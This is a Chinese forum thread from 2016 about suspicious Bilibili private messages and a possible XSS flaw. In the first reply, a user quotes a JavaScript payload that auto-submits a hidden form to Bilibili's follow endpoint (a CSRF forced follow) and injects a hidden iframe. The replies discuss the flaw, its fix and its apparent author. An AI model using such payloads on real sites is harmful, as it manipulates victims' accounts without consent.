V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
yksoft1
V2EX  ›  信息安全

这几天 B 站是不是又出现 XSS 漏洞了?收到奇怪的私信

  •  
  •   yksoft1 · 2016-02-04 01:04:08 +08:00 · 4365 次点击
    这是一个创建于 3249 天前的主题,其中的信息可能已经有所发展或是发生改变。
    18 条回复    2016-02-04 15:59:12 +08:00
    yksoft1
        1
    yksoft1  
    OP
       2016-02-04 01:16:13 +08:00
    http://xbilibili.3990577.com/xbilibili.js

    var strhtml = '';

    if (self != top) {
    strhtml += '<form id="xbilibili" action="http://space.bilibili.com/ajax/friend/AddAttention" method="post">';
    strhtml += '<input type="text" name="mid" value="4926267" />';
    strhtml += '</form>';

    $(document.body).append(strhtml);
    $("#xbilibili").submit();
    }else{
    strhtml = '<iframe src="http://message.bilibili.com/#whisper/rid216246424b93bed4331ba30d5c0371d1" style="display: none"></iframe>';

    $(document.body).append(strhtml);
    }


    不仅试图强行加关注,还试图另外开一个 iframe

    域名 whois 里面出来一个 email, [email protected] 自称黑客还给 TX 交 VIP 。。。
    这个 email 查可以查到一个博客 http://www.hackblog.cn/
    virusdefender
        2
    virusdefender  
       2016-02-04 01:35:37 +08:00
    这个 xss 看着并没成功,但是楼上贴的 js 貌似暴露了一个 csrf
    BROWNURSIDAE
        3
    BROWNURSIDAE  
       2016-02-04 01:36:47 +08:00
    那个 meiliwang110 我认识
    aprikyblue
        4
    aprikyblue  
       2016-02-04 08:25:19 +08:00
    坐等 “我就是那个 meiliwang110 ” 系列
    ragnaroks
        5
    ragnaroks  
       2016-02-04 09:01:02 +08:00
    a 站也是
    SourceMan
        6
    SourceMan  
       2016-02-04 09:30:43 +08:00
    微博可以换私信界面的皮肤啦?
    RIcter
        7
    RIcter  
       2016-02-04 09:37:06 +08:00
    http://www.wooyun.org/whitehats/Down/

    不行了他 blog 太中二了- -
    RIcter
        8
    RIcter  
       2016-02-04 09:39:25 +08:00
    ..这个人我还见过,之前一起在杭电打比赛..233((
    erevus
        9
    erevus  
       2016-02-04 10:24:48 +08:00
    是的 已经修补好了.
    所以问题来了,同样是 Java 为什么别人家的修复方式不会导致中文乱码也不会导致程序效率低呢?
    luoisnotgod
        10
    luoisnotgod  
       2016-02-04 13:01:22 +08:00 via iPhone
    @yksoft1 首先我没自称黑客啊。。那个 js 其实不是试图 iframe ,是因为跨域请求的问题。目的是强行加关注。
    luoisnotgod
        11
    luoisnotgod  
       2016-02-04 13:02:03 +08:00 via iPhone
    @RIcter 哥,哪里中二了,你说我改。。
    zander
        12
    zander  
       2016-02-04 13:09:33 +08:00
    得,正主来了。
    yexm0
        13
    yexm0  
       2016-02-04 13:16:24 +08:00 via Android
    世界真细小
    yangff
        14
    yangff  
       2016-02-04 13:53:06 +08:00
    “这个 XSS 本来是内部安全测试时候发现了,已经修好的。但是上周开发手贱回滚版本了,然后上周又被我发现了。他说这个星期二上新版本修复这个问题...不说了,我去切他 JJ...”

    哈哈哈哈哈
    RIcter
        15
    RIcter  
       2016-02-04 14:09:36 +08:00 via iPhone
    @luoisnotgod 233 ,博客主题
    luoisnotgod
        16
    luoisnotgod  
       2016-02-04 14:28:24 +08:00 via iPhone
    @RIcter 好吧,晚上就改。当初纯属为了 seo ,就一直没大改过。我加你 qq 了。
    hcymk2
        17
    hcymk2  
       2016-02-04 14:45:32 +08:00
    @luoisnotgod
    那个博客名字的字体别改 我觉得蛮好的.
    karjarjam
        18
    karjarjam  
       2016-02-04 15:59:12 +08:00
    @luoisnotgod 求博客名字字体
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1020 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 22:10 · PVG 06:10 · LAX 14:10 · JFK 17:10
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.